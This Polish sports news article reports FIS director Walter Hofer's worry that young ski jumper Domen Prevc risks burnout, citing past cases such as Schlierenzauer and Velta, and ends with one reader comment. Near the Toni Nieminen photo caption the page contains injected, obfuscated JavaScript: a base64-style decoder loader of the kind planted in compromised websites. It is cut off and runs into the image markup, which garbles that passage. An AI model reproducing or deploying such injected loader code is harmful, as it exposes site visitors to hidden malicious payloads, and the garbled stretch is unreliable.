You are currently viewing Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”

Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”

Hofer.Walter Prevc.Domen fot.B.Leja .J.Piatkowksa - Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”Najmłodszy z braci Prevców typowany jest jako główny pretendent do zwycięstwa w 65. edycji Turnieju Czterech Skoczni. Zapowiada to zarówno jego wysoka forma, pucharowe zwycięstwa oraz dystans skoczka do odnoszonych sukcesów. Obecna sytuacja w czołówce klasyfikacji generalnej niepokoi jednak dyrektora PŚ, Waltera Hofera.

 

Hofer sceptycznie o „cudownych dzieciach”

Hofer Walter WC.Planica.2016 fot.Bartosz.Leja  300x200 - Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”
Walter Hofer (fot. Bartosz Leja)

Walter Hofer oficjalnie przyznał, ze nie jest w pełni zadowolony z faktu pasma zwycięstw, jakie odniósł ostatnio najmłodszy z braci Prevc. Nie jest to wyraz złej woli Austriaka, lecz obawa o psychikę młodego i mało doświadczonego jeszcze sportowca. 17-letni Domen z racji swojego młodego wieku oraz niezaprzeczalnego talentu, nazywany jest kolejnym cudownym dzieckiem skoków narciarskich. Dyrektor Pucharu Świata zdaje sobie sprawę, że z tym mianem wiąże się ogromne psychiczne obciążenie zawodnika, który wraz z upływem czasu czuje potrzebę odnoszenia kolejnych zwycięstw oraz doświadcza presji otoczenia, które wymaga od niego ciągłego podnoszenia sobie poprzeczki. Stąd już prosta droga do sportowego wypalenia i porzucenia obiecującej kariery we wczesnym, jak na sportowca, wieku. Ostatnie lata obfitują w tego rodzaju przypadki w świecie skoków narciarskich.

 

Pułapki na młodych skoczków

Schlierenzauer Gregor S.Piwowar Oslo 300x200 - Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”
Gregor Schlierenzauer (fot. Stefan Piwowar)

Najbardziej spektakularnym przykładem w ostatnich latach może być przypadek Gregora Schlierenzaura, który jako 16-latek odniósł 3 pucharowe zwycięstwa. Kilka ostatnich sezonów w wykonaniu Austriaka pozostawiało jednak wiele do życzenia. Kibice mogli zaobserwować stopniowy spadek formy Austriaka, który w ubiegłym sezonie zdecydował o zawieszeniu kariery. Szczęśliwie, podopieczny Heinza Kuttina ostatnio zapowiedział powrót do rywalizacji na światowych arenach już na początku przyszłego roku – według zapowiedzi mamy go zobaczyć na belce startowej konkursów PŚ w Wiśle. Równie znanymi przykładami zawodowego wypalenia są choćby Norwegowie Rune Velta i Phillip Sjoeen. Pierwszy z nich ogłosił koniec kariery po sezonie, w którym wywalczył tytuł mistrza świata na skoczni normalnej w Falun. Dla zawodnika takie wydarzenie okazało się zbyt wielkim przełomem. 27-latek stracił motywację i chęci do dalszego doskonalenia się w tej dyscyplinie sportu. Podobną sytuację przeżył 6 lat młodszy Sjoeen, który co prawda seniorskiego tytułu mistrzowskiego w swojej dotychczasowej karierze nie wywalczył, ale seria juniorskich sukcesów, której doświadczył zimą 2 lata temu, również wypaliła go „zawodowo”. 20-latek ciągle walczy z brakiem motywacji, można więc mieć nadzieję, że jego talent będzie jeszcze powodem dumy dla Norwegów.

 

Konsekwencje rewolucji lat 90.

Nieminen Toni Mistrzostwa - Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0andii.Taivalkoski.2016_fot.SM-hiihdot.2016.Taivalkoski-300×200.jpg” alt=”Toni Nieminen (fot. SM-hiihdot 2016 Taivalkoski)” width=”300″ height=”200″ /> Toni Nieminen (fot. SM-hiihdot 2016 Taivalkoski)

Walter Hofer jako wieloletni dyrektor PŚ, spotkał w swojej karierze wielu utalentowanych młodych sportowców. Do wszystkich odnosi się jednak z właściwym sobie dystansem.  FIS jako organizacja niechętnie widzi młodych skoczków jako superbohaterów sezonu lub wielkich sportowych imprez. Niedoświadczonym zawodnikom czasami brakuje charyzmy i elokwencji. Tylko sportowiec o takich atrybutach może odpowiednio reprezentować ten sport na arenie międzynarodowej. W ciągu ostatnich dwóch dekad przedstawiciele FIS poczynili wiele zmian w regulaminie PŚ, aby utrudnić kreowanie młodocianych talentów, które szybko mogłyby ulec wypaleniu: zaostrzono m. in. zasady w sprawie kombinezonów, nart, minimalnego indeksu masy ciała zawodników – powiedział Austriak.

Velta Rune WSC.Falun .2015.podium fot.Julia .Piatkowska 300x200 - Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”
Rune Velta (fot. Julia Piątkowska)

Odkąd w latach 90. doszło do prawdziwej rewolucji za sprawą upowszechnienia się „stylu V” oraz nowych materiałów do produkcji sprzętu sportowego, pucharowe sukcesy zaczęli odnosić coraz młodsi zawodnicy. Jednym z niewielu, któremu udało się to przed przełomem technologicznym lat 90. był Kanadyjczyk Steve Collins, który w 1980 roku w wieku 15 lat odniósł zwycięstwo w konkursie z cyklu PŚ. W czasach stylu klasycznego skoki uważane były za sport siłowy  materiały i sprzęt odgrywały drugorzędną rolę, ponieważ  gwarantem dalekiego skoku było odpowiednio mocne wybicie się z progu. Zmiany technologiczne ostatniej dekady ubiegłego wieku sprawiły, że to nie siła, ale aerodynamika i technika nabrała kluczowego znaczenia. W 1992 roku właśnie dzięki zastosowaniu „stylu V” oraz nowych materiałów, 16-letni reprezentant Finlandii Toni Nieminen zdobył olimpijskie złoto na dużej skoczni. Dla FIS-u był to z kolei sygnał do podjęcia wspomnianych przez Hofera podjęcia działań zaostrzających regulamin PŚ.

 

Odwaga kontra doświadczenie

Prevc Domen WC.Wisla .2016 fot.Julia .Piatkowska 300x200 - Hofer o D.Prevcu: „Niechętnie widzimy młodych skoczków jako superbohaterów”
Domen Prevc (fot. Julia Piątkowska)

Skoki jako sport wyczynowy stanowią unikalną mieszankę dużej dozy odwagi i dostatecznego przygotowania. Spora odwaga jest charakterystyczna szczególnie dla młodych sportowców, którzy, jak ma to miejsce również w przypadku Domena Prevca, w fazie lotu potrafią wykazać się wyjątkowo "agresywnym" stylem.  Przez pierwsze 30 metrów lotu wygląda to tak, jakby zawodnik nie czuł nart – opisuje charakterystyczną sylwetkę Słoweńca w locie sam Walter Hofer. Takie podejście wymaga maksymalnej zaufania we własne możliwości oraz brak obaw o trudne warunku atmosferyczne, czego często brakuje starszym zawodnikom. Strach przed ryzykiem upadku często bywa w ich przypadku silniejszy i dlatego wolą oddać krótszy, lecz bezpieczniejszy i wyżej oceniony za styl skok, niż przedłużać moment lądowania podejmując zbędne ryzyko. Jak widać na przykładzie 17-letniego Prevca, ryzyko często się opłaca. Jeśli zawodnik pozostanie zdystansowany wobec swoich wielkich sukcesów i nie pozwoli nałożyć na siebie presji otoczenia, całkiem możliwe, że uda mu się uniknąć pułapki, w którą wpadli m.in. Schlierenzauer, Velta i Sjoeen.

 

źródło: tagesanzeiger.ch / informacja własna

 

Ten post ma jeden komentarz

  1. Anna

    No i Walter ma racje. Fajnie się ogląda młodocianych ale jak forma spada i psychicznie nie wytrzymują presji to aż żal patrzeć na młodych…

Dodaj komentarz